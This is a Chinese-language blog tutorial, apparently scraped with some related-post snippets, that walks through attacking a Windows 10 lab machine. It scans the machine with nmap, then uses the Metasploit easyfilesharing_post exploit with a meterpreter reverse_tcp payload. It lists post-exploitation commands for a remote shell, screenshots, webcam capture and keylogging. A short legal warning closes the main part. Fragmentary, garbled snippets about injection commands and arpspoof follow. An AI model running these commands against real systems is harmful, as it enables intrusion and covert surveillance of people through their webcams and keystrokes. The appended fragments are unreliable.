攻擊環境:攻擊者系統:虛擬機器下kali linux靶機系統:win10(需要開啟easy file sharing服務)攻擊者ip:10.3.134.27靶機ip:10.3.37.56攻擊者和靶機在同乙個wifi下,保證在同一網段裡,能互相ping通。漏洞利用:esayfilesharing
準備工作完成,可以開始內網滲透之旅了。
首先我們先用nmap掃瞄一下靶機開了哪些服務root@kali:~# nmap -sv 10.3.37.56
namp掃瞄結果
我們可以看到80埠和443埠開放了,對應的是easy file sharing web server,滿足easyfilesharing漏洞攻擊,進入下一步。
開啟msf控制台,設定攻擊引數
root@kali:~# msfconsole #進入控制台,稍微等一下msf > search easyfilesharing #查詢我們要用的漏洞
搜尋結果
我們選擇最新的乙個,2017-06-12的版本,並設定payload。
msf > use exploit/windows/http/easyfilesharing_post #使用這個漏洞msf exploit(windows/http/easyfilesharing_post) > set payload windows/meterpreter/reverse_tcp #設定攻擊payload設定引數
根據required屬性看一下哪些是需要配置的,其中一些是配置好的,我們只需將其他的配置好就ok了。
msf exploit(windows/http/easyfilesharing_post) > set lhost 10.3.134.27 #設定本地ipmsf exploit(windows/http/easyfilesharing_post) > set rhost 10.3.37.56 #設定遠端ipmsf exploit(windows/http/easyfilesharing_post) > exploit #攻擊逐個輸入以下命令,試試
meterpreter > getuid #獲取靶機uidmeterpreter > shell #進入靶機shellmeterpreter > screenshot #靶機截圖meterpreter > webcam_snap #用靶機攝像頭拍照meterpreter > webcam_stream #用靶機攝像頭錄影meterpreter > keyscan_start #開啟鍵盤記錄meterpreter > keyscan_dump #捕獲鍵盤記錄meterpreter > keyscan_stop #停止鍵盤記錄
捕捉到靶機鍵盤記錄(hack hack)
2nd.捕捉靶機截圖
捕捉靶機截圖
捕捉靶機截圖
3rd.用靶機攝像頭拍照
利用靶機攝像頭拍照
靶機攝像頭畫素略渣,不過看看我們的公教區學習環境吧
我們做攻擊實驗都是在環境都配置好的情況下,現實生活中不會有這麼好的肉雞。而且網路攻擊屬於違法行為,人生路漫漫,且行且珍惜
注入攻擊命令大全
提示資訊 ifrequest action then response.write 不用我多說什麼了吧!endif sqlserver資料庫的備份與恢復 ifrequest action backupdatabase then dimsqlserver,sqlname,sqlpassword,sql...
msf win10漏洞 利用msf攻擊win10
攻擊環境 攻擊者系統 虛擬機器下kali linux靶機系統 win10 需要開啟easy file sharing服務 攻擊者ip 10.3.134.27靶機ip 10.3.37.56攻擊者和靶機在同乙個wifi下,保證在同一網段裡,能互相ping通。漏洞利用 esayfilesharing 準備...
kali內網攻擊 arpspoof
arpspoof是一款arp欺騙攻擊工具 檢視物理機ip位址,將kali的ip位址設定為和物理機同一網段。虛擬機器網路介面卡設定為橋接模式 複製物理網路連線狀態 虛擬網路編輯器在管理員模式下啟動後,設定vmnet0為橋接模式,外部鏈結選擇物理機網絡卡。開啟埠 echo 1 proc sys net ...